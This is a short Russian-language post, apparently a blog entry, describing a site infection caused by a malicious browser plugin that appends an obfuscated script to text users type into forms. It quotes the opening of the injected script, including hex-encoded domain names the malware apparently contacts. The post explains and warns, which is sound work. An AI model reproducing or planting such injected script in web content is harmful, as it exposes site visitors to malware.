На днях столкнулся с новой заразой, которая распространяет вредоносный код по сайтам, сидя при этом в плагине браузера! Ко мне обратился человек с просьбой обезвредить вирус на своем сайте. То что сайт заражен он понял по тому что стал срабатывать антивирус, не давая открыть страницу, но самое интересное оказалось в том, как этот вредоносный код попал на сайт.
Открыв исходный код страницы я увидел такой кода (привожу только его начало):
<script >// < ! [ CDATA [ window.a1336404323 = 1;!function(){var o=JSON.parse('[" 616c396c323335676b6337642e7275 "," 6e796b7a323871767263646b742e72 75"]')
Поискав его фрагменты в файлах я ничего не обнаружил. Оказалось этот код просто добавлен к тексту самого поста в некоторых страницах сайта и кое-где даже по нескольку раз. Сайт я от него вычистил просто почистив посты, но как же он на него попал? Поискав части кода в гугле оказалось что интернет пестрит постами на форумах, досках объявлений, комментариях и т.п. То есть код всегда цепляется к тексту, который человек набирает в полях ввода. Также я нашел упоминания что этим безобразием занимается один из вредоносных плагинов, что расставляет все на свои места.